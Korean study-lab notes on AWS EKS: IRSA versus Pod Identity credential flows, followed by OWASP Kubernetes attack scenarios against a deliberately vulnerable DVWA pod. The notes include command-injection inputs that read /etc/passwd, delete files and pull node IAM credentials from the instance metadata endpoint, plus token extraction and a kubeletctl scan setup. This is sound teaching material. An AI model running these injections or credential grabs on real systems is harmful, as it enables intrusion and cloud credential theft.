실습 3 OIDC
# Create an iamserviceaccount - AWS IAM role bound to a Kubernetes service account
eksctl create iamserviceaccount \
--name my-sa \
--namespace default \
--cluster $CLUSTER_NAME \
--approve \
--attach-policy-arn $(aws iam list-policies --query 'Policies[?PolicyName==`AmazonS3ReadOnlyAccess`].Arn' --output text)
# 확인 >> 웹 관리 콘솔에서 CloudFormation Stack >> IAM Role 확인
# aws-load-balancer-controller IRSA는 어떤 동작을 수행할 것 인지 생각해보자!
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamserviceaccount --cluster $CLUSTER_NAME
NAMESPACE NAME ROLE ARN
default my-sa arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
kube-system aws-load-balancer-controller arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-kube-sy-Role1-eRtMjg6MGlN1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa
NAME SECRETS AGE
default 0 4h20m
my-sa 0 69s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe sa my-sa
Name: my-sa
Namespace: default
Labels: app.kubernetes.io/managed-by=eksctl
Annotations: eks.amazonaws.com/role-arn: arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
Image pull secrets: <none>
Mountable secrets: <none>
Tokens: <none>
Events: <none>
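It can also be instructive to look at the trust policy of the role eksctl just created; a sketch that parses the role name out of the annotation shown above (ROLE_ARN is a helper variable introduced here):
# the trust policy should allow sts:AssumeRoleWithWebIdentity from the cluster's OIDC provider, scoped to this service account
ROLE_ARN=$(kubectl get sa my-sa -o jsonpath='{.metadata.annotations.eks\.amazonaws\.com/role-arn}')
aws iam get-role --role-name "${ROLE_ARN##*/}" --query 'Role.AssumeRolePolicyDocument' | jq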
# Pod 3 생성
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
spec:
serviceAccountName: my-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF
# 해당 SA를 파드가 사용 시 mutatingwebhook으로 Env,Volume 추가함
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get mutatingwebhookconfigurations pod-identity-webhook -o yaml | kubectl neat | yh
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
name: pod-identity-webhook
webhooks:
- admissionReviewVersions:
- v1beta1
clientConfig:
caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCVENDQWUyZ0F3SUJBZ0lJYlh5NHdmMWZhb0l3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TkRBME1USXhNVFE1TURKYUZ3MHpOREEwTVRBeE1UVTBNREphTUJVeApFekFSQmdOVkJBTVRDbXQxWW1WeWJtVjBaWE13Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLCkFvSUJBUURrQ24yZzdRWGZBOGtKOU83U3N6Mnd5aiswbUMrUWdFOEdBMkNSSStwTEYvbHErNEhiblNzbWhJYk4KTElPcmlUNTIrRVhaRWZmSWZSQUNxWG5wL1ZhS3o5U2xMdGpqcGhhblp2L2RMTkhnZEE1eWVzWnNEZFo0c2xuYQpjWjNremhNS2VCZVJXREkvL2ZVVGtaWldYYzNJUnhrVkhZaFN1QVNwRzk4ZjRVRWRGY1E5Sno0czB2czRyRnIvCmI3a0xzYW9rUHo2R1p3MFFkdFBRQUdrZitmc0VETHFvZG9HckYzZ2FUVHM5VXVnOUtxMmZxNXp5THNmSGZVQy8KemZvUkVwRmxsSGJyR2FpQUZvZUthTlhtTjN5YUd1UnI3ZndJSDlud1B4UjJOZWxYdWkyNWx6amlwNGozTVJBWQpnU2JvY1V4VkNMUkE1cnFzcGl5RCsvTllEdk9wQWdNQkFBR2pXVEJYTUE0R0ExVWREd0VCL3dRRUF3SUNwREFQCkJnTlZIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJUUFYvY3V6ODdMOTgzZ2wwYTNpTS9XM2pTQTFEQVYKQmdOVkhSRUVEakFNZ2dwcmRXSmxjbTVsZEdWek1BMEdDU3FHU0liM0RRRUJDd1VBQTRJQkFRQWg2N0xTNFBwdgpZdEZoendqTzEzK3BQZzQrZHVIM3ROL3ozOVh5YUhhTXRkL0hHazNBRXErSnRvcnVqbWNQUWtZTU5OdVkwK0xsCjJQZXdrTmUwUSs4QXN3a1RTUnpNUGltcWx6RktHNk9NbUFkbVBkUVNrZ2MvVEVCRjl4ZkJBdmltaG1OQUlJVWcKb2FrL1grc2pPYmpmQS9yUndKVnBNQUwvTjRNclAvTkJsRytxYjcraFpaRVMzVnJERGRuSElIcWtRcHBwMTJMcwpnUHlzQ2JnSldCZEZIcW91MUdlTWE3QmFmN2huZWJrUDg2SlhaemZEUW4ydHlTZXZoNnAxMnpIeDZwTm1BVjMvClpxZUE1TG5SM0tsbXF0TkF1M3NKblkvUEpSbzNXU05lcDJ0RWJRVTBDVVlLQmIwMjhhQzJ3OVp5bFVQK0gvelIKNFJxOTFXdjdxRjBsCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
url: https://127.0.0.1:23443/mutate
failurePolicy: Ignore
matchPolicy: Equivalent
name: iam-for-pods.amazonaws.com
reinvocationPolicy: IfNeeded
rules:
- apiGroups:
- ""
apiVersions:
- v1
operations:
- CREATE
resources:
- pods
scope: '*'
sideEffects: None
timeoutSeconds: 10
# 파드 생성 yaml에 없던 내용이 추가됨!!!!!
# Pod Identity Webhook은 mutating webhook을 통해 아래 Env 내용과 1개의 볼륨을 추가함
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-iam-test3
NAME READY STATUS RESTARTS AGE
eks-iam-test3 1/1 Running 0 2m8s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-iam-test3 -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
- name: AWS_DEFAULT_REGION
value: ap-northeast-2
- name: AWS_REGION
value: ap-northeast-2
- name: AWS_ROLE_ARN
value: arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
- name: AWS_WEB_IDENTITY_TOKEN_FILE
value: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-klxsd
readOnly: true
- mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount
name: aws-iam-token
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: my-sa
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: aws-iam-token
projected:
sources:
- serviceAccountToken:
audience: sts.amazonaws.com
expirationSeconds: 86400
path: token
- name: kube-api-access-klxsd
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- ls /var/run/secrets/eks.amazonaws.com/serviceaccount
token
$ kubectl describe pod eks-iam-test3
...
Environment:
AWS_STS_REGIONAL_ENDPOINTS: regional
AWS_DEFAULT_REGION: ap-northeast-2
AWS_REGION: ap-northeast-2
AWS_ROLE_ARN: arn:aws:iam::911283464785:role/eksctl-myeks-addon-iamserviceaccount-default-Role1-GE2DZKJYWCEN
AWS_WEB_IDENTITY_TOKEN_FILE: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
Mounts:
/var/run/secrets/eks.amazonaws.com/serviceaccount from aws-iam-token (ro)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-69rh8 (ro)
...
Volumes:
aws-iam-token:
Type: Projected (a volume that contains injected data from multiple sources)
TokenExpirationSeconds: 86400
kube-api-access-sn467:
Type: Projected (a volume that contains injected data from multiple sources)
TokenExpirationSeconds: 3607
ConfigMapName: kube-root-ca.crt
ConfigMapOptional: <nil>
DownwardAPI: true
...
# 파드에서 aws cli 사용 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamserviceaccount --cluster $CLUSTER_NAME
NAMESPACE NAME ROLE ARN
default my-sa arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z
kube-system aws-load-balancer-controller arn:aws:iam::236747833953:role/eksctl-myeks2-addon-iamserviceaccount-kube-sy-Role1-eRtMjg6MGlN1
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z/botocore-session-1712938663"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws s3 ls
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws ec2 describe-instances --region ap-northeast-2
An error occurred (UnauthorizedOperation) when calling the DescribeInstances operation: You are not authorized to perform this operation. User: arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z/botocore-session-1712938663 is not authorized to perform: ec2:DescribeInstances because no identity-based policy allows the ec2:DescribeInstances action
command terminated with exit code 254
# 당연히 안됨 - s3 readonlyaccess 이기 때문
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-iam-test3 -- aws ec2 describe-vpcs --region ap-northeast-2
An error occurred (UnauthorizedOperation) when calling the DescribeVpcs operation: You are not authorized to perform this operation. User: arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-addon-iamserviceaccount-default-Role1-7y447UXCxl1Z/botocore-session-1712938663 is not authorized to perform: ec2:DescribeVpcs because no identity-based policy allows the ec2:DescribeVpcs action
command terminated with exit code 254
IAM_TOKEN=$(kubectl exec -it eks-iam-test3 -- cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token)
echo $IAM_TOKEN
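This is the crux of the article below: anyone holding this projected web identity token can try to exchange it for temporary credentials from anywhere, as long as the token has not expired; a sketch reusing IAM_TOKEN and the role ARN from the service account annotation:
# (sketch) a leaked token can be redeemed outside the cluster with a plain STS call
ROLE_ARN=$(kubectl get sa my-sa -o jsonpath='{.metadata.annotations.eks\.amazonaws\.com/role-arn}')
aws sts assume-role-with-web-identity --role-arn "$ROLE_ARN" \
--role-session-name leaked-token-test --web-identity-token "$IAM_TOKEN" \
--query 'Credentials.Expiration'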
(https://medium.com/@7424069/aws-how-to-use-eks-irsa-in-the-most-vulnerable-way-5d8f4c8d6d20)
⚠️ Pod Identity를 씁시다.⚠️
# 리소스 삭제
kubectl delete pod eks-iam-test3
eksctl delete iamserviceaccount --cluster $CLUSTER_NAME --name my-sa --namespace default
eksctl get iamserviceaccount --cluster $CLUSTER_NAME
kubectl get sa
신기능 : Pod Identity
IRSA 와는 동작 자체가 다릅니다!
애드온으로 설치 가능
# 설치
ADDON=eks-pod-identity-agent
aws eks describe-addon-versions \
--addon-name $ADDON \
--kubernetes-version 1.28 \
--query "addons[].addonVersions[].[addonVersion, compatibilities[].defaultVersion]" \
--output text
v1.2.0-eksbuild.1
True
v1.1.0-eksbuild.1
False
v1.0.0-eksbuild.1
False
# 모니터링
watch -d kubectl get pod -A
# 설치
aws eks create-addon --cluster-name $CLUSTER_NAME --addon-name eks-pod-identity-agent
or
eksctl create addon --cluster $CLUSTER_NAME --name eks-pod-identity-agent --version 1.2
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get addon --cluster $CLUSTER_NAME
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kube-system get daemonset eks-pod-identity-agent
NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE
eks-pod-identity-agent 3 3 3 3 3 <none> 78s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kube-system get pods -l app.kubernetes.io/name=eks-pod-identity-agent
NAME READY STATUS RESTARTS AGE
eks-pod-identity-agent-cg64b 1/1 Running 0 81s
eks-pod-identity-agent-s4ljt 1/1 Running 0 81s
eks-pod-identity-agent-z9vzj 1/1 Running 0 81s
kubectl get ds -n kube-system eks-pod-identity-agent -o yaml | kubectl neat | yh
...
containers:
- args:
- --port
- "80"
- --cluster-name
- myeks
- --probe-port
- "2703"
command:
- /go-runner
- /eks-pod-identity-agent
- server
....
ports:
- containerPort: 80
name: proxy
protocol: TCP
- containerPort: 2703
name: probes-port
protocol: TCP
...
securityContext:
capabilities:
add:
- CAP_NET_BIND_SERVICE
...
hostNetwork: true
...
# hostNetwork: true - the agent runs in the worker node's network namespace and listens on a link-local address
# Check the network configuration
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=96657,fd=7))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=96657,fd=6))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=96657,fd=8))
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c route; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c -br -4 addr; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c addr; done
...
24: pod-id-link0: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
link/ether ca:05:90:46:3d:df brd ff:ff:ff:ff:ff:ff
inet 169.254.170.23/32 scope global pod-id-link0
valid_lft forever preferred_lft forever
inet6 fd00:ec2::23/128 scope global
valid_lft forever preferred_lft forever
inet6 fe80::c805:90ff:fe46:3ddf/64 scope link
valid_lft forever preferred_lft forever
...
# 서비스 어카운트와 IAM Policy 와 연결
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl create podidentityassociation \
> --cluster $CLUSTER_NAME \
> --namespace default \
> --service-account-name s3-sa \
> --role-name s3-eks-pod-identity-role \
> --permission-policy-arns arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess \
> --region $AWS_REGION
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get sa
NAME SECRETS AGE
default 0 11h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get podidentityassociation --cluster $CLUSTER_NAME
ASSOCIATION ARN NAMESPACE SERVICE ACCOUNT NAME IAM ROLE ARN
arn:aws:eks:ap-northeast-2:236747833953:podidentityassociation/myeks2/a-orpwrxhhve1stbpaf default s3-sa arn:aws:iam::236747833953:role/s3-eks-pod-identity-role
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-pod-identity-associations --cluster-name $CLUSTER_NAME | jq
{
"associations": [
{
"clusterName": "myeks2",
"namespace": "default",
"serviceAccount": "s3-sa",
"associationArn": "arn:aws:eks:ap-northeast-2:236747833953:podidentityassociation/myeks2/a-orpwrxhhve1stbpaf",
"associationId": "a-orpwrxhhve1stbpaf"
}
]
}
# The trust policy also allows sts:TagSession to support ABAC (session tags)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam get-role --query 'Role.AssumeRolePolicyDocument' --role-name s3-eks-pod-identity-role | jq .
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "pods.eks.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:TagSession"
]
}
]
}
# 서비스어카운트, 파드 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create sa s3-sa
serviceaccount/s3-sa created
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-pod-identity
spec:
serviceAccountName: s3-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod eks-pod-identity -o yaml | kubectl neat| yh
apiVersion: v1
kind: Pod
metadata:
name: eks-pod-identity
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
- name: AWS_DEFAULT_REGION
value: ap-northeast-2
- name: AWS_REGION
value: ap-northeast-2
- name: AWS_CONTAINER_CREDENTIALS_FULL_URI
value: http://169.254.170.23/v1/credentials
- name: AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE
value: /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-c9pp4
readOnly: true
- mountPath: /var/run/secrets/pods.eks.amazonaws.com/serviceaccount
name: eks-pod-identity-token
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: s3-sa
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: eks-pod-identity-token
projected:
sources:
- serviceAccountToken:
audience: pods.eks.amazonaws.com
expirationSeconds: 86400
path: eks-pod-identity-token
- name: kube-api-access-c9pp4
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-pod-identity -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/s3-eks-pod-identity-role/eks-myeks2-eks-pod-id-b26827b2-92b1-488a-81d6-2345428fea44"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it eks-pod-identity -- env | grep AWS
AWS_STS_REGIONAL_ENDPOINTS=regional
AWS_DEFAULT_REGION=ap-northeast-2
AWS_REGION=ap-northeast-2
AWS_CONTAINER_CREDENTIALS_FULL_URI=http://169.254.170.23/v1/credentials
AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE=/var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token
# 토큰 정보 확인
kubectl exec -it eks-pod-identity -- ls /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/
kubectl exec -it eks-pod-identity -- cat /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token
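The agent's credential endpoint can also be called by hand the same way the SDK does, by presenting the projected token in the Authorization header; a minimal sketch, assuming curl is present in the amazon/aws-cli image:
# fetch temporary credentials from the Pod Identity Agent (output truncated to avoid printing full secrets)
kubectl exec -it eks-pod-identity -- sh -c 'curl -s -H "Authorization: $(cat $AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE)" "$AWS_CONTAINER_CREDENTIALS_FULL_URI" | cut -c1-120'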
eksctl delete podidentityassociation --cluster $CLUSTER_NAME --namespace default --service-account-name s3-sa
kubectl delete pod eks-pod-identity
kubectl delete sa s3-sa
OWASP Kubernetes Top Ten : K8S 보안 위협
악분님의 시나리오로 실습
EKS pod가 IMDS API를 악용하는 시나리오
mysql deploy
cat <<EOT > mysql.yaml
apiVersion: v1
kind: Secret
metadata:
name: dvwa-secrets
type: Opaque
data:
# s3r00tpa55
ROOT_PASSWORD: czNyMDB0cGE1NQ==
# dvwa
DVWA_USERNAME: ZHZ3YQ==
# p@ssword
DVWA_PASSWORD: cEBzc3dvcmQ=
# dvwa
DVWA_DATABASE: ZHZ3YQ==
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-mysql-service
spec:
selector:
app: dvwa-mysql
tier: backend
ports:
- protocol: TCP
port: 3306
targetPort: 3306
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-mysql
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-mysql
tier: backend
template:
metadata:
labels:
app: dvwa-mysql
tier: backend
spec:
containers:
- name: mysql
image: mariadb:10.1
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
ports:
- containerPort: 3306
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: ROOT_PASSWORD
- name: MYSQL_USER
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
EOT
kubectl apply -f mysql.yaml
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 8h
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 8h
dvwa-mysql-5d87894bb6-zxkmq 1/1 Running 0 12s
cat <<EOT > dvwa.yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: dvwa-config
data:
RECAPTCHA_PRIV_KEY: ""
RECAPTCHA_PUB_KEY: ""
SECURITY_LEVEL: "low"
PHPIDS_ENABLED: "0"
PHPIDS_VERBOSE: "1"
PHP_DISPLAY_ERRORS: "1"
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-web-service
spec:
selector:
app: dvwa-web
type: ClusterIP
ports:
- protocol: TCP
port: 80
targetPort: 80
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-web
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-web
template:
metadata:
labels:
app: dvwa-web
spec:
containers:
- name: dvwa
image: cytopia/dvwa:php-8.1
ports:
- containerPort: 80
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
env:
- name: RECAPTCHA_PRIV_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PRIV_KEY
- name: RECAPTCHA_PUB_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PUB_KEY
- name: SECURITY_LEVEL
valueFrom:
configMapKeyRef:
name: dvwa-config
key: SECURITY_LEVEL
- name: PHPIDS_ENABLED
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_ENABLED
- name: PHPIDS_VERBOSE
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_VERBOSE
- name: PHP_DISPLAY_ERRORS
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHP_DISPLAY_ERRORS
- name: MYSQL_HOSTNAME
value: dvwa-mysql-service
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
- name: MYSQL_USERNAME
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
EOT
kubectl apply -f dvwa.yaml
cat <<EOT > dvwa-ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
alb.ingress.kubernetes.io/group.name: study
alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/ssl-redirect: "443"
alb.ingress.kubernetes.io/success-codes: 200-399
alb.ingress.kubernetes.io/target-type: ip
name: ingress-dvwa
spec:
ingressClassName: alb
rules:
- host: dvwa.$MyDomain
http:
paths:
- backend:
service:
name: dvwa-web-service
port:
number: 80
path: /
pathType: Prefix
EOT
kubectl apply -f dvwa-ingress.yaml
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo -e "DVWA Web https://dvwa.$MyDomain"
DVWA Web https://dvwa.22joo.shop
# 명령 실행 가능 확인
8.8.8.8 ; echo ; hostname
8.8.8.8 ; echo ; whoami
8.8.8.8 ; curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
AQAEALuFUlNOrA4dg1kZCzRVjhy2BPmP0vQhb6VDdVqH-jqYsjDX2w==
8.8.8.8 ; curl -s -H "X-aws-ec2-metadata-token: AQAEALuFUlNOrA4dg1kZCzRVjhy2BPmP0vQhb6VDdVqH-jqYsjDX2w==" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/
eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
8.8.8.8 ; curl -s -H "X-aws-ec2-metadata-token: AQAEALuFUlNOrA4dg1kZCzRVjhy2BPmP0vQhb6VDdVqH-jqYsjDX2w==" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
8.8.8.8; cat /etc/passwd
8.8.8.8; rm -rf /tmp/*
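A common mitigation for this scenario (not part of the original walkthrough) is to require IMDSv2 and lower the hop limit to 1 so that pod-originated traffic can no longer reach the instance metadata service; <instance-id> is a placeholder for each worker node:
# enforce IMDSv2 and a hop limit of 1 on a worker node (repeat per instance)
aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-tokens required --http-put-response-hop-limit 1 --http-endpoint enabled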
Hands-on with 악분's scenario: the risk of weak kubelet authentication/authorization settings + the kubeletctl tool
# 노드의 kubelet API 인증과 인가 관련 정보 확인
ssh ec2-user@$N1 cat /etc/kubernetes/kubelet/kubelet-config.json | jq
ssh ec2-user@$N1 cat /var/lib/kubelet/kubeconfig | yh
# 노드의 kubelet 사용 포트 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# ssh ec2-user@$N1 sudo ss -tnlp | grep kubelet
LISTEN 0 4096 127.0.0.1:10248 0.0.0.0:* users:(("kubelet",pid=3019,fd=16))
LISTEN 0 4096 *:10250 *:* users:(("kubelet",pid=3019,fd=17))
# 데모를 위해 awscli 파드 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# cat <<EOF | kubectl apply -f -
> apiVersion: v1
> kind: Pod
> metadata:
> name: myawscli
> spec:
> #serviceAccountName: my-sa
> containers:
> - name: my-aws-cli
> image: amazon/aws-cli:latest
> command: ['sleep', '36000']
> restartPolicy: Never
> terminationGracePeriodSeconds: 0
> EOF
pod/myawscli created
# 파드 사용
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it myawscli -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0ba38cf4130566468"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it myawscli -- aws s3 ls
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied
command terminated with exit code 254
# 조회 가능
kubectl exec -it myawscli -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it myawscli -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
# 기존 kubeconfig 삭제
## Bastion Host 2 에서 진행
rm -rf ~/.kube
# 다운로드
curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
kubeletctl version
kubeletctl help
# 노드1 IP 변수 지정
N1=<각자 자신의 노드1의 PrivateIP>
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# k get pods -owide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 9h 192.168.1.162 ip-192-168-1-231.ap-northeast-2.compute.internal <none> <none>
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 9h 192.168.3.16 ip-192-168-3-12.ap-northeast-2.compute.internal <none> <none>
dvwa-mysql-5d87894bb6-zxkmq 1/1 Running 0 33m 192.168.3.221 ip-192-168-3-12.ap-northeast-2.compute.internal <none> <none>
dvwa-web-6654c98f76-zpdl9 1/1 Running 0 31m 192.168.2.208 ip-192-168-2-179.ap-northeast-2.compute.internal <none> <none>
myawscli 1/1 Running 0 4m47s 192.168.1.108 ip-192-168-1-231.ap-northeast-2.compute.internal <none> <none>
# pod 가 node1 에 존재하기 때문에 N1=192.168.1.231
# 노드1 IP로 Scan
